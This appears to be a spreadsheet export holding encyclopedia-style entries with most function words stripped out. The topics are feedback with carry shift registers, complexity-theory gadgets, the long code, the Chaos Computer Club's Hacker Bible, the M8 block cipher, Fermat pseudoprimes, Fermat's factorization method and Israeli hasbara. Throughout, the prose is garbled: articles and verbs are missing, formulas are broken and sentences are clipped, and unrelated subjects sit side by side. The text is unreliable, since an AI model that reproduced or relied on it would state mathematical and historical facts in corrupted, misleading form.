    <t>sequence design, feedback carry shift register fcsr) arithmetic carry analog linear-feedback shift register (lfsr). {\displaystyle n&gt;1} integer, n-ary fcsr length {\displaystyle finite state device state {\displaystyle (a;z)=(a_{0},a_{1},\dots ,a_{r-1};z)} consisting vector elements {\displaystyle a_{i}} {\displaystyle \{0,1,\dots ,n-1\}=s} integer {\displaystyle state change operation determined coefficients {\displaystyle q_{1},\dots ,q_{n}} defined follows: compute {\displaystyle s=q_{r}a_{0}+q_{r-1}a_{1}+\dots +q_{1}a_{r-1}+z} express {\displaystyle s=a_{r}+nz'} {\displaystyle a_{r}} {\displaystyle then state {\displaystyle (a_{1},a_{2},\dots ,a_{r};z')} iterating state change fcsr generates infinite, eventually periodic sequence numbers {\displaystyle fcsrs used design stream ciphers (such f-fcsr generator), cryptanalysis summation combiner stream cipher (the reason goresky klapper invented them), generating pseudorandom numbers quasi-monte carlo (under name multiply with carry (mwc) generator invented couture l'ecuyer,) generalizing work marsaglia zaman.fcsrs analyzed using number theory. associated fcsr connection integer {\displaystyle q=q_{r}n^{r}+\dots +q_{1}n^{1}-1} associated output sequence n-adic number {\displaystyle a=a_{0}+a_{1}n+a_{2}n^{2}+\dots fundamental theorem fcsrs says integer {\displaystyle {\displaystyle a=u/q} rational number. output sequence strictly periodic {\displaystyle {\displaystyle {\displaystyle possible express simple quadratic polynomial involving initial state qi.there also exponential representation fcsrs: {\displaystyle inverse {\displaystyle n{\pmod {q}}} output sequence strictly periodic, {\displaystyle a_{i}=(ag_{i}{\bmod {q}}){\bmod {n}}} {\displaystyle integer. follows period order multiplicative group units modulo this maximized prime primitive element modulo case, period {\displaystyle q-1} case output sequence called l-sequence (for "long sequence").l-sequences many excellent statistical properties make candidates applications, including near uniform distribution sub-blocks, ideal arithmetic autocorrelations, arithmetic shift property. they with-carry analog m-sequences maximum length sequences. there efficient algorithms fcsr synthesis. this problem: given prefix sequence, construct minimal length fcsr outputs sequence. this solved variant mahler weger's lattice based analysis n-adic numbers {\displaystyle n=2} variant euclidean algorithm prime; general xu's adaptation berlekamp-massey algorithm. size smallest fcsr outputs sequence (called n-adic complexity sequence), algorithms require prefix length {\displaystyle successful quadratic time complexity. follows that, lfsrs linear complexity, stream cipher whose n-adic complexity used cryptography. fcsrs lfsrs special cases general algebraic construction sequence generators called algebraic feedback shift registers (afsrs) integers replaced arbitrary ring replaced arbitrary non-unit general reference subject lfsrs, fcsrs, afsrs book. references</t>
  </si>
  <si>
    <t>Gadget (computer science)</t>
  </si>
  <si>
    <t>computational complexity theory, gadget subset problem instance simulates behavior fundamental units different computational problem. gadgets typically used construct reductions computational problem another, part proofs np-completeness types computational hardness. component design technique method constructing reductions using gadgets.szabó (2009) traces gadgets 1954 paper graph theory tutte, tutte provided gadgets reducing problem finding subgraph given degree constraints perfect matching problem. however, "gadget" terminology later origin, appear tutte's paper. example many np-completeness proofs based many-one reductions 3-satisfiability, problem finding satisfying assignment boolean formula conjunction (boolean and) clauses, clause disjunction (boolean three terms, term boolean variable negation. reduction problem hard problem undirected graphs, hamiltonian cycle problem graph coloring, would typically based gadgets form subgraphs simulate behavior variables clauses given 3-satisfiability instance. these gadgets would glued together form single graph, hard instance graph problem consideration.for instance, problem testing 3-colorability graphs proven np-complete reduction 3-satisfiability type. reduction uses special graph vertices, labeled "ground" "false", part gadget. shown figure, gadget variable consists vertices connected triangle ground vertex; vertices gadget labeled labeled negation gadget clause consists vertices, connected other, vertices representing terms ground false vertices edges shown. 3-cnf formula converted graph constructing separate gadget variables clauses connecting shown.in 3-coloring resulting graph, designate three colors true, false, ground, false ground colors given false ground vertices (necessarily different, vertices made adjacent construction) true remaining color used either vertices. within variable gadget, colorings possible: vertex labeled variable must colored either true false, vertex labeled variable's negation must correspondingly colored either false true. way, valid assignments colors variable gadgets correspond one-for-one truth assignments variables: behavior gadget respect coloring simulates behavior variable respect truth assignment. each clause assignment valid 3-coloring least adjacent term vertices colored true, cannot 3-colored adjacent term vertices colored false. way, clause gadget colored corresponding truth assignment satisfies clause, behavior gadget simulates behavior clause. restricted reductions agrawal (1997) considered called radically simple form gadget reduction", describing part gadget depend bounded number bits input, used reductions prove analogue berman–hartmanis conjecture stating np-complete sets polynomial-time isomorphic.the standard definition np-completeness involves polynomial time many-one reductions: problem definition np-complete every problem reduction type standard proving problem np-complete find polynomial time many-one reduction known np-complete problem agrawal called curious, often observed fact") sets known np-complete time could proved complete using stronger notion many-one reductions: reductions computed circuits polynomial size, constant depth, unbounded fan-in. agrawal proved every np-complete reductions complete even restricted type reduction, many-one reductions, using circuits polynomial size, constant depth, bounded fan-in. reduction, output reduction depend constant number input bits, berman–hartmanis conjecture unsolved problem computational complexity theory stating np-complete problem classes polynomial-time isomorphic. that np-complete problem classes, polynomial-time one-to-one reduction whose inverse also computable polynomial time. agrawal used equivalence reductions reductions show sets complete reductions ac0-isomorphic. optimization gadgets application gadgets proving hardness approximation results, reducing problem known hard approximate another problem whose hardness proven. application, typically family instances first problem objective function values, hard determine whether given instance objective function side high side gap. reductions used proofs, gadgets used reductions, must preserve existence gap, strength inapproximability result derived reduction depend well preserved. trevisan (2000) formalize problem finding gap-preserving gadgets, families constraint satisfaction problems goal maximize number satisfied constraints. they give example reduction 3-satisfiability 2-satisfiability garey, johnson stockmeyer (1976), gadget representing 3-sat clause consists 2-sat clauses, truth assignment satisfies 3-sat clause also satisfies least seven clauses gadget, truth assignment fails satisfy 3-sat clause also fails satisfy clauses gadget. using gadget, fact (unless polynomial-time approximation scheme maximizing number 3-sat clauses truth assignment satisfies, shown similarly approximation scheme 2-sat. trevisan show that, many cases constraint satisfaction problems study, gadgets leading strongest possible inapproximability results constructed automatically, solution linear programming problem. gadget-based reductions also used direction, transfer approximation algorithms easier problems harder problems. instance, trevisan provide optimal gadget reducing 3-sat weighted variant 2-sat (consisting seven weighted 2-sat clauses) stronger garey, johnson stockmeyer (1976); using together known semidefinite programming approximation algorithms 2-sat, provide approximation algorithm 3-sat approximation ratio 0.801, better previously known algorithms. references</t>
  </si>
  <si>
    <t>Long code (mathematics)</t>
  </si>
  <si>
    <t>theoretical computer science coding theory, long code error-correcting code locally decodable. long codes extremely poor rate, play fundamental role theory hardness approximation. definition {\displaystyle f_{1},\dots ,f_{2^{n}}:\{0,1\}^{k}\to \{0,1\}} {\displaystyle k=\log list functions {\displaystyle \{0,1\}^{k}\to \{0,1\}} then long code encoding message {\displaystyle x\in \{0,1\}^{k}} string {\displaystyle f_{1}(x)\circ f_{2}(x)\circ \dots \circ f_{2^{n}}(x)} {\displaystyle \circ denotes concatenation strings. this string length {\displaystyle 2^{n}=2^{2^{k}}} walsh-hadamard code subcode long code, obtained using functions {\displaystyle f_{i}} linear functions interpreted functions {\displaystyle \mathbb _{2}^{k}\to \mathbb _{2}} finite field elements. since {\displaystyle 2^{k}} functions, block length walsh-hadamard code {\displaystyle 2^{k}} equivalent definition long code follows: long code encoding {\displaystyle j\in [n]} defined truth table boolean dictatorship function {\displaystyle coordinate, i.e., truth table {\displaystyle f:\{0,1\}^{n}\to \{0,1\}} {\displaystyle f(x_{1},\dots ,x_{n})=x_{j}} thus, long code encodes {\displaystyle (\log -bit string {\displaystyle 2^{n}} -bit string. properties long code contain repetitions, sense function {\displaystyle f_{i}} computing {\displaystyle output different function {\displaystyle f_{j}} computing {\displaystyle output {\displaystyle j\neq among codes contain repetitions, long code longest possible output. moreover, contains non-repeating codes subcode. references</t>
  </si>
  <si>
    <t>Hacker Bible</t>
  </si>
  <si>
    <t>hacker bible publication german hacker organization chaos computer club (ccc). published editions date, 1985 1988. both edited holland published grüne kraft press. hacker bible compendium documents stories hacker scene, example instruction guide acoustic coupler named “data-loo”(germ.:datenklo). furthermore, offers manuals technical explanations. first edition appeared 1985 subtitle “cable salad good you" ("kabelsalat gesund”) sold 25,000 copies mid-1988. second edition 1988 given additional name “the testament”. comic images cover sleeve creation german comic artists mali beinhorn werner büsch comic workshop büsch-beinhorn. production distribution hacker bible discontinued 1990. since 1999, offered scanned full-text version online german) materials texts peter glaser, documentation karl koch works tron chaos-cd. bibliography holland, (1985), hackerbibel "kabelsalat gesund", werner pieper, isbn 3922708986. holland, (1985), hackerbibel "das neue testament", werner pieper, isbn 3925817247. references external links online archive hackerbibel online archive hackerbibel solidarity hacker website</t>
  </si>
  <si>
    <t>M8 (cipher)</t>
  </si>
  <si>
    <t>cryptography, block cipher designed hitachi 1999. modification hitachi's earlier algorithm, designed greater security high performance hardware 32-bit software implementations. registered hitachi march 1999 iso/iec 9979-0020.like feistel cipher block size bits. round function include 32-bit rotations, xors, modular addition, making early example cipher. cipher features variable number rounds (any positive integer structure determined round-specific "algorithm decision key". making rounds key-dependent intended make cryptanalysis difficult (see frog similar design philosophy). cipher description round count positive integer round count least recommended. consists four components: 64-bit data key, 256-bit expansion key, 24-bit algorithm decision keys, 96-bit algorithm expansion keys. round function used expansion encryption/decryption. expansion process transforms 64-bit data 256-bit expansion 256-bit execution key, consisting pairs 32-bit numbers {\displaystyle k_{r_{0}},k_{l_{0}},...,k_{r_{3}},k_{l_{3}}} cipher typical feistel cipher design. first, 64-bit input block split 32-bit halves. round, left half undergoes key-dependent transformation, combined right half. finally, halves swapped. total, round function consists sequence nine customizable operations three bitwise rotations: {\displaystyle {\begin{aligned}r_{i+1}&amp;=l_{i}\\x&amp;=l_{i}\operatorname {op} _{1}k_{l_{i{\bmod {4}}}}\\y&amp;=((x&lt;&lt;&lt;s_{1})\operatorname {op} _{2}x)\operatorname {op} _{3}\alpha \\z&amp;=(((y&lt;&lt;&lt;s_{2})\operatorname {op} _{4}y)\operatorname {op} _{5}\beta )\operatorname {op} _{6}k_{r_{i{\bmod {4}}}}\\l_{i+1}&amp;=(((z&lt;&lt;&lt;s_{3})\operatorname {op} _{7}z)\operatorname {op} _{8}\gamma )\operatorname {op} _{9}r_{i}\end{aligned}}} {\displaystyle denotes round number, takes inputs {\displaystyle l_{i}} {\displaystyle r_{i}} {\displaystyle \alpha ,\beta ,\gamma three 32-bit words round's algorithm expansion key. {\displaystyle k_{r_{i{\bmod {4}}}},k_{l_{i{\bmod {4}}}}} words execution key. {\displaystyle &lt;&lt;&lt;} denotes left bitwise rotation. {\displaystyle \operatorname {op} _{j}} {\displaystyle s_{k}} defined 24-bit algorithm decision follows: addition 232, xor) five bits each. expansion consists eight cipher rounds, using first eight algorithm decision expansion keys, expansion execution key, data input block. eight intermediate outputs, {\displaystyle l_{1},l_{2},...,l_{7},l_{8}} used eight components execution {\displaystyle k_{r_{0}},k_{l_{0}},...,k_{r_{3}},k_{l_{3}}} cipher implementation following implementation cipher python. test vectors published version iso/iec 9979-0020 includes following test data: round number: expansion key: 0256 all-zeros vector) data key: 0123 4567 89ab cdef algorithm decision key: rounds ...: 848b6d rounds ...: 8489bb rounds ...: 84b762 rounds ...: 84eda2 algorithm expansion key: 0000 0001 0000 0000 0000 0000 roundsplaintext: 0000 0000 0000 0001 ciphertext rounds: c5d6 fbad 76ab a53b ciphertext rounds: 6380 4805 68db 1895 ciphertext rounds: 2bfb 806e 1292 5b18 ciphertext rounds: f610 6a41 88c5 8747 ciphertext rounds: d3e1 66e9 c50a 10a2 final ciphertext rounds: fe4b 1622 e446 36c0 cryptanalysis key-dependent behaviour cipher results large class weak keys expose cipher range attacks, including differential cryptanalysis, linear cryptanalysis cryptanalysis. references</t>
  </si>
  <si>
    <t>Fermat pseudoprime</t>
  </si>
  <si>
    <t>number theory, fermat pseudoprimes make important class pseudoprimes come fermat's little theorem. definition fermat's little theorem states prime coprime ap−1 divisible integer composite integer divides ax−1 called fermat pseudoprime base def. 3.32 words, composite integer fermat pseudoprime base successfully passes fermat primality test base false statement numbers pass fermat primality test base prime, called chinese hypothesis. smallest base-2 fermat pseudoprime 341. prime, since equals 11·31, satisfies fermat's little theorem: 2340 (mod 341) thus passes fermat primality test base pseudoprimes base sometimes called sarrus numbers, sarrus discovered property, poulet numbers, poulet made table numbers, fermatians (sequence a001567 oeis). fermat pseudoprime often called pseudoprime, modifier fermat understood. integer fermat pseudoprime values coprime called carmichael number.: def. 3.34 properties distribution there infinitely many pseudoprimes given base 1904, cipolla showed produce infinite number pseudoprimes base prime divide 1)/(a 1)/(a then composite, pseudoprime base example, pseudoprime base fact, infinitely many strong pseudoprimes base greater (see theorem infinitely many carmichael numbers, comparatively rare. there three pseudoprimes base 1000, million, 21853 less 25·109. there 4842 strong pseudoprimes base 2163 carmichael numbers limit (see table starting 17·257, product consecutive fermat numbers base-2 pseudoprime, fermat composites mersenne composites. factorizations factorizations poulet numbers 60787, including carmichael numbers bold), following table. (sequence a001567 oeis) poulet number whose divisors divide called super-poulet number. there infinitely many poulet numbers super-poulet numbers. smallest fermat pseudoprimes smallest pseudoprime base given following table; colors mark number prime factors. unlike definition start article, pseudoprimes excluded table. (for allow pseudoprimes oeis: a090086) (sequence a007535 oeis) list fermat pseudoprimes fixed base information (base 100), oeis: a020159 oeis: a020228, bases 150, table fermat pseudoprimes (text german), page define pseudoprime base congruent (mod which bases make fermat pseudoprime? composite {\displaystyle even, {\displaystyle fermat pseudoprime trivial base {\displaystyle b\equiv 1{\pmod {n}}} composite {\displaystyle odd, {\displaystyle fermat pseudoprime trivial bases {\displaystyle b\equiv 1{\pmod {n}}} composite {\displaystyle number distinct bases {\displaystyle modulo {\displaystyle {\displaystyle fermat pseudoprime base {\displaystyle thm. 1392 {\displaystyle \prod _{i=1}^{k}\gcd(p_{i}-1,n-1)} {\displaystyle p_{1},\dots ,p_{k}} distinct prime factors {\displaystyle this includes trivial bases. example, {\displaystyle n=341=11\cdot product {\displaystyle \gcd(10,340)\cdot \gcd(30,340)=100} {\displaystyle n=341} smallest nontrivial base {\displaystyle b=2} every composite {\displaystyle fermat pseudoprime least nontrivial bases modulo {\displaystyle unless {\displaystyle power cor. 1393 composite 200, following table bases fermat pseudoprime. composite number table sequence a209211), pseudoprime trivial base modulo information 5000), see, page define pseudoprime base congruent (mod when prime, fermat pseudoprime base wieferich prime base example, 10932 1194649 fermat pseudoprime base fermat pseudoprime base number values (for prime, number values must since satisfy fermat little theorem) (sequence a063994 oeis)the least base pseudoprime base prime number) (sequence a105222 oeis)the number values must divides {\displaystyle \varphi (n), a000010(n) (the quotient natural number, quotient prime carmichael number (561, 1105, 1729, 2465, 2821, 6601, 8911, 10585, 15841, a002997), quotient sequence: 703, 1891, 2701, 11305, 12403, 13981, 18721, a191311) least number values number exists) 232, 190, 276, 1106, 286, 1854, 3820, 891, 2752, 1128, 595, 2046, 532, 1770, 9952, 425, 1288, 2486, 8474, 742, 3486, 7612, 5589, 2356, 13584, 325, 9850, (sequence a064234 oeis) even totient squarefree number, term sequence weak pseudoprimes composite number satisfy {\displaystyle b^{n}\equiv b{\pmod {n}}} called weak pseudoprime base pseudoprime base (under usual definition) satisfies condition. conversely, weak pseudoprime coprime base pseudoprime usual sense, otherwise case. least weak pseudoprime base are: 341, (sequence a000790 oeis)all terms less equal smallest carmichael number, 561. except 561, semiprimes occur sequence, semiprimes less occur, semiprime less occurs sequences divides (see oeis: a108574) besides, smallest pseudoprime base (also necessary exceeding (oeis: a090086) also usually semiprime, first counterexample a090086(648) require (for ...) 341, (sequence a239293 oeis)carmichael numbers weak pseudoprimes bases. smallest even weak pseudoprime base 161038 (see oeis: a006935). euler–jacobi pseudoprimes another approach refined notions pseudoprimality, e.g. strong pseudoprimes euler–jacobi pseudoprimes, analogues carmichael numbers. this leads probabilistic algorithms solovay–strassen primality test, baillie–psw primality test, miller–rabin primality test, produce known industrial-grade primes. industrial-grade primes integers primality "certified" (i.e. rigorously proven), undergone test miller–rabin test nonzero, arbitrarily low, probability failure. applications rarity pseudoprimes important practical implications. example, public-key cryptography algorithms require ability quickly find large primes. usual algorithm generate prime numbers generate random numbers test primality. however, deterministic primality tests slow. user willing tolerate arbitrarily small chance number found prime number pseudoprime, possible much faster simpler fermat primality test. references external links galway feitsma, tables pseudoprimes base related data (comprehensive list pseudoprimes base 264, including factorization, strong pseudoprimes, carmichael numbers) research pseudoprime</t>
  </si>
  <si>
    <t>Fermat's factorization method</t>
  </si>
  <si>
    <t>fermat's factorization method, named pierre fermat, based representation integer difference squares: {\displaystyle n=a^{2}-b^{2}.} that difference algebraically factorable {\displaystyle (a+b)(a-b)} neither factor equals one, proper factorization each number representation. indeed, {\displaystyle n=cd} factorization {\displaystyle n=\left({\frac {c+d}{2}}\right)^{2}-\left({\frac {c-d}{2}}\right)^{2}} since odd, also odd, halves integers. multiple four also difference squares: even.) simplest form, fermat's method might even slower trial division (worst case). nonetheless, combination trial division fermat's effective either. basic method tries various values hoping {\displaystyle a^{2}-n=b^{2}} square. fermatfactor(n): ceiling(sqrt(n)) repeat square: equivalently: return sqrt(b2) sqrt(b2) example, factor 5959 {\displaystyle n=5959} first square root 5959 rounded next integer, then, 5959 {\displaystyle b^{2}=78^{2}-5959=125} since square, second made increasing value second attempt also fails, square. third produces perfect square 441. {\displaystyle a=80} {\displaystyle b=21} factors 5959 {\displaystyle a-b=59} {\displaystyle a+b=101} suppose prime factors. that procedure first finds factorization least values that {\displaystyle a+b} smallest factor square-root {\displaystyle a-b=n/(a+b)} largest factor root-n. procedure finds {\displaystyle n=1\cdot shows prime. {\displaystyle n=cd} largest subroot factor. {\displaystyle a=(c+d)/2} number steps approximately {\displaystyle (c+d)/2-{\sqrt {n}}=({\sqrt {d}}-{\sqrt {c}})^{2}/2=({\sqrt {n}}-c)^{2}/2c} prime {\displaystyle c=1} needs {\displaystyle o(n)} steps. this prove primality. factor close square root, method works quickly. more precisely, differs less {\displaystyle {\left(4n\right)}^{1/4}} {\displaystyle {\sqrt {n}}} method requires step; independent size fermat's trial division consider trying factor prime number 2345678917, also compute throughout. going {\displaystyle {\sqrt {n}}} tabulate: practice, bother last integer. observe subroot factor 47830.1 {\displaystyle a-b=47830.1} fermat's method would found already. trial division would normally 48,432; four fermat steps, need divide 47830, find factor prove primality. this suggests combined factoring method. choose bound {\displaystyle c&gt;{\sqrt {n}}} fermat's method factors {\displaystyle {\sqrt {n}}} {\displaystyle this gives bound trial division {\displaystyle c-{\sqrt {c^{2}-n}}} example, 48436 {\displaystyle c=48436} bound trial division 47830. reasonable choice could 55000 {\displaystyle c=55000} giving bound 28937. regard, fermat's method gives diminishing returns. would surely stop point: sieve improvement when considering table 2345678917 {\displaystyle n=2345678917} quickly tell none values {\displaystyle b^{2}} squares: necessary compute square-roots {\displaystyle a^{2}-n} even examine values squares always congruent modulo values repeat increase example, subtracting adding {\displaystyle a^{2}-n} produces modulo values. apparent list square. thus, {\displaystyle a^{2}} must means produce {\displaystyle b^{2}} ends and, square, this performed modulus. using 2345678917 {\displaystyle n=2345678917} generally chooses power different prime modulus. given sequence a-values (start, end, step) modulus, proceed thus: fermatsieve(n, astart, aend, astep, modulus) astart modulus times: square, modulo modulus: fermatsieve(n, aend, astep modulus, nextmodulus) endif astep enddo recursion stopped a-values remain; (aend-astart)/astep small. also, step-size constant, compute successive b2's additions. multiplier improvement fermat's method works best factor near square-root approximate ratio factors {\displaystyle d/c} known, rational number {\displaystyle v/u} picked near value. {\displaystyle nuv=cv\cdot fermat's method, applied nuv, find factors {\displaystyle {\displaystyle quickly. then {\displaystyle \gcd(n,cv)=c} {\displaystyle \gcd(n,du)=d} (unless divides divides generally, ratio known, various {\displaystyle u/v} values tried, factor resulting nuv. lehman devised systematic this, fermat's plus trial division factor {\displaystyle o(n^{1/3})} time. other improvements fundamental ideas fermat's factorization method basis quadratic sieve general number field sieve, best-known algorithms factoring large semiprimes, "worst-case". primary improvement quadratic sieve makes fermat's factorization method instead simply finding square sequence {\displaystyle a^{2}-n} finds subset elements sequence whose product square, highly efficient manner. result same: difference square that, nontrivial, used factor factorization rectangles method modified rectangles instead squares, adding constant {\displaystyle (a+c)\times a-(b+c)\times b=(a-b)\times (a+b+c)} factorization cubes {\displaystyle a^{3}-b^{3}=(a-b)\times ((a+b)\times a+b\times factorization cuboids {\displaystyle (a+c)\times a^{2}-(b+c)\times b^{2}=(a-b)\times ((a+b+c)\times a+(b+c)\times also completing square factorization polynomials factor theorem foil rule monoid factorisation pascal's triangle prime factor factorization euler's factorization method integer factorization program synthesis table gaussian integer factorizations unique factorization notes references fermat (1894), oeuvres fermat, vol. mckee, (1999). "speeding fermat's factoring method". mathematics computation (68): 1729–1737. external links fermat's factorization running time, blogspot.in fermat's factorization online calculator, windowspros.ru</t>
  </si>
  <si>
    <t>Hasbara</t>
  </si>
  <si>
    <t>public diplomacy israel public diplomacy favor state israel, i.e. efforts aimed communicating directly citizens countries inform influence support tolerate israeli government's strategic objectives. terms types different terms used describe israel's actors' efforts reach audiences abroad. among early zionists common label communicative efforts propaganda. theodor herzl used term zionist congress 1899, asked fellow zionists audience engage propaganda". time term "propaganda" considered neutral. term pejorative. propaganda typically used official government statements critics pro-israeli advocacy groups portray communication misleading manipulative. hasbara formally introduced zionist vocabulary nahum sokolow. hasbara (hebrew: הַסְבָּרָה) direct english translation, roughly means "explaining". communicative strategy "seeks explain actions, whether justified". focuses providing explanations one's actions, hasbara called "reactive event-driven approach".today, israeli practitioners tend label communicative efforts "public diplomacy", hasbara, indicating shift strategy. they consider focus "explaining" defensive prefer actively determine agenda less reactive proactive, moving comprehensive, long-term strategic approach.israeli public diplomacy encompasses different forms communication forms interaction public abroad. instance, israel engages open fully attributable, unidirectional mass communication targets unaffiliated civil populations countries form communication hirschberger defines "external communication"), social media traditional mass media. israeli government uses type communication especially depict israel positively communication strategy hirschberger calls "branding"). israeli government pro-israeli groups also interventive communication counter attempts delegitimisation israel, e.g., context bds. israeli government also engages activities beyond communicative efforts social media traditional mass media, e.g., form cultural diplomacy. communicative efforts pro-israeli civil society groups partially also called "advocacy". actors various branches israeli government well pro-israeli civil society organizations engage public diplomacy efforts: spokesperson's unit idf: spokesperson’s unit israeli defense forces (idf) plays central role israeli government's public diplomacy. idf's english-language facebook page most-followed army social media worldwide. unit become israel's largest spokesperson unit, officers, civilians soldiers. there also reserve unit almost 1,200 soldiers officers. 2017, unit staff members responsible idf's social media platforms reach audiences abroad. 2015, active different social media platforms. spokesperson's unit cogat: coordination government activities territories (cogat), unit responsible coordination liaison palestinian authority, spokesperson's unit well social media channels english arabic. prime minister's office (pmo): within israel prime minister's office, government press office (gpo), public diplomacy directorate national information directorate involved public diplomacy efforts. national information directorate charge coordinating "the public diplomacy activities various governmental bodies foreign security affairs, socioeconomic issues" (israel s.a.). public diplomacy directorate responsible communicating prime minister's government's policies decisions. directorate headed prime minister’s media advisor. ministry foreign affairs (mfa): israeli ministry foreign affairs also public diplomacy directorate. "the directorate consists media public affairs division, division cultural affairs scientific cooperation bureau religious affairs relations jewish diaspora. media public affairs division comprises department charge 'branding', department charge collecting information, producing visual media content videos drafting policy papers briefing israeli missions around world, well spokesperson’s bureau, charge relationship press. furthermore, division also academic department small department dealing issues civil society affairs, especially battle bds. finally, ministry also digital diplomacy department, charge digital channels ministry". pro-israeli civil society organizations: various civil society organizations initiatives israel abroad support israeli public diplomacy efforts. prominent examples standwithus, american israel public affairs committee (aipac), washington institute near east policy (winep), anti-defamation league (adl), christians united israel (cufi), israel campus coalition, amcha initiative "the david project". masbirim israel: 2010, israeli ministry information diaspora affairs launched campaign "masbirim israel". campaign intended encourage israeli citizens contribute improving israel's image talking international contacts country. history 1970-1999 early mentions term hasbara english mainstream print media date late 1970s describe "overseas image-building." according washington post, work called hasbara purpose reshape public opinion abroad." early 1980s, hasbara defined "public relations campaign." newsweek described "explaining." 1986, york times reported program "communicating defense goals" started late 1970s, 1984 implementation "hasbara project" "train foreign-service officers communications placing american companies." carl spielvogel, chairman backer spielvogel, traveled israel advise government communicating defense goals. trip hasbara project, internship program established train foreign-service officers communications placing american companies.shmuel katz's book battleground: fact fantasy palestine, published 1973, described encyclopedic source-book involved israel's hasbara (public relations) effort" moshe phillips, national director herut north america's u.s. section. 1977, prime minister menachem begin named katz "adviser prime minister information abroad."in 1992, jerusalem post reported american jewish leaders hardly reacted news foreign ministry's hasbara department would eliminated part sweeping reorganization ministry. malcolm hoenlein noted talk streamlining ministry's hasbara functions time. said merging hasbara department's functions press department portend downgrading priority likud government gives hasbara abroad. foxman reacted similarly, saying "not distressed disturbed", noted disseminating hasbara always responsibility every foreign ministry staff officer, especially working abroad; eliminating department means everyone assume greater responsibility efforts distributing hasbara, favor. also reported personnel foreign hasbara departments would shifted press departments, much work currently done hasbara officials properly belongs. explained israel's efforts provide hasbara abroad would focus media communications. 2000-2009 2001, shmuel katz published retrospective israeli hasbara efforts said hasbara "must tackled occasional sudden sallies separate permanent department government." sharon increase hasbara efforts, create cabinet-level ministry purpose.also 2001, israeli foreign affairs ministry, diplomatic government israel, original co-sponsor hasbara fellowships activities aish hatorah. jewish agency israel, department jewish zionist education, operates campaign called "hasbara, israeli advocacy, your guide middle east conflict". 2007, hasbara fellowships asserted "wikipedia objective resource rather online encyclopedia edit. result website large part controlled 'intellectuals' seek rewrite history arab-israeli conflict. these authors systematically subtly rewritten passages thousands wikipedia entries portray israel negative light. opportunity stop dangerous trend! interested joining team wikipedians make sure israel presented fairly accurately, please contact [our] director". similar advocacy campaign wikipedia later launched committee accuracy middle east reporting america 2008; five editors involved campaign sanctioned wikipedia administrators, wrote wikipedia's open nature fundamentally incompatible creation private group surreptitiously coordinate editing".in 2002, israeli state comptroller's office issued report critical israel's efforts. lack overall strategic public relations conception objective" lack coordination various organizations mentioned. funding levels modest; ministry foreign affairs spent us$8.6 million efforts 2002, government press office budgeted us$100,000.in 2008, yarden vatikay appointed coordinate israel's domestic foreign media policy.in 2009, israel's foreign ministry organized volunteers pro-israeli commentary news websites. july 2009, announced israeli foreign ministry would assemble "internet warfare" squad spread pro-israel messages various websites, funding 600,000 shekels (about $150,000). 2010 present 2010 report produced israeli cabinet reut institute cited newspaper haaretz exemplifies common israeli view hasbara efforts needed respond describes diffuse "delegitimization network" anti-israel activists. haaretz "the network's activists—'delegitimizers' report dubs them—are relatively marginal: young people, anarchists, migrants radical political activists." newspaper also cites report saying network promotes pro-palestinian activities europe "trendy," calls monitored israeli intelligence services, cabinet treat network strategic threat. concludes israel prepared meet threat network posed counter-effort must vigorously undertaken respond it.neil lazarus says calls "low budget, grassroots hasbara 2.0" come age, commends websites keep track supporters anti-israel media bias, promote email campaigns israel's behalf. observes "israel's hasbara seems becoming dynamic, diaspora takes responsibility", "even schools masa programs conscripted task." methods israel citizens information council (icic) says purpose assist efforts explain israeli life vantage point average israeli citizen. towards end, icic enlists israelis walks life participate various projects major activities production special powerpoint presentations post website. these presentations review specific aspects issues related israel middle east."some hasbara experts study methods used palestinian activists offer advice respond. describing demonstrators "youths," example, creates different impression calling "children." they draw attention subtle differences meaning words demonstration riot, terror organization palestinian political organization. they advise name calling point scoring.edward said wrote hasbara methods used second intifada included lunches free trips influential journalists; seminars jewish university students; invitations congressmen; pamphlets donation money election campaigns; telling photographers writers photograph write about; lecture concert tours prominent israelis; frequent references holocaust; advertisements newspapers attacking arabs praising israel.the israeli foreign ministry instituted training appropriate social media methods hasbara strategy. there multiple instances embarrassing inappropriate tweets posts israeli embassies, particularly ireland leadership boaz moda'i, brought international condemnation. response incidents, israel's foreign ministry updated online social media guidelines worldwide representatives israeli government, "combat doctrine" media guide include appropriate "do's don'ts." shaping foreign public opinion israeli officials emphasized importance molding american public opinion influence u.s. foreign policy favourably toward israel. example, prime minister benjamin netanyahu said, last years, appeared innumerable times american media thousands american leaders. developed certain ability influence public opinion." netanyahu made statement context israeli government's decade-long effort pressure military action iran. added important thing: ability sway public opinion united states regime iran.” coordination diaspora zionist organizations major american jewish organizations played significant role advancing israeli state narrative american public. rabbi alexander schindler, former chair conference presidents major american jewish organizations, said, "the presidents' conference members instruments official governmental israeli policy. seen task receive directions government circles best matter affect jewish community." similarly, hyman bookbinder, high-ranking official american jewish committee, said, "unless something terribly pressing, really critical fundamental, parrot israel's line order retain american support. american jews, around saying israel wrong policies."mitchell bard written, framing issues terms national interest, aipac attract broader support would ever possible perceived represent interests israel. this mean aipac close relationship israeli officials; does, albeit unofficially. even lobby sometimes comes conflict israeli government."according shivi greenfield nachman shai, israeli government (particularly ministry foreign affairs, former ministry public diplomacy diaspora affairs, ministry tourism) worked various israeli international non-government organizations promote israeli public diplomacy within global jewish diaspora international community. notable israeli ngos involved public diplomacy included jewish agency israel, israel project, honestreporting, middle east media research institute (memri), palestine media watch (pmw). israeli government also partnered several jewish christian zionist ngos u.s. abroad, including anti-defamation league (adl), american israel public affairs committee (aipac), american jewish committee (ajc), conference presidents major american jewish organizations, christians united israel (cufi), jewish federations north america (jfna), zionist organization america (zoa).according greenfield shai, israeli government sympathetic ngos, including hillel international, b'nai b'rith, israel heart, standwithus, sought promote sympathy israel among university students study tours (such birthright israel masa israel, talks, meetings, distributing educational materials, distributing educational materials, gift packages, fundraising, blood donations. these campus outreaches seek strengthen ties israel jewish diaspora support efforts jewish students combat so-called "anti-israel" activism campus israeli apartheid week. shai identifies "israel campus coalition" umbrella organization pro-israel american campus organizations. funded schusterman foundation hillel.according shahar burla, israeli foreign public diplomacy ministries worked local australian jewish community zionist organizations local chapter united israel appeal, australasian union jewish students, zionist council south wales south wales jewish board deputies mobilize australian jews supporting israeli hasbara efforts 2010 gaza flotilla raid. ministry public diplomacy diaspora affairs established "communications room" circulate pro-israel information global jewish diaspora. these mobilization efforts email messages, websites, traditional media, meetings demonstrations. pro-israel sympathizers encouraged share pro-israel videos articles social media platforms, respond blogs shows, write editorial letters. further reading aouragh, miriyam (2016). "hasbara 2.0: israel's public diplomacy digital age". middle east critique. (3): 271–297. doi:10.1080/19436149.2016.1179432. s2cid 147947753. retrieved october 2021. avraham, september 2009). 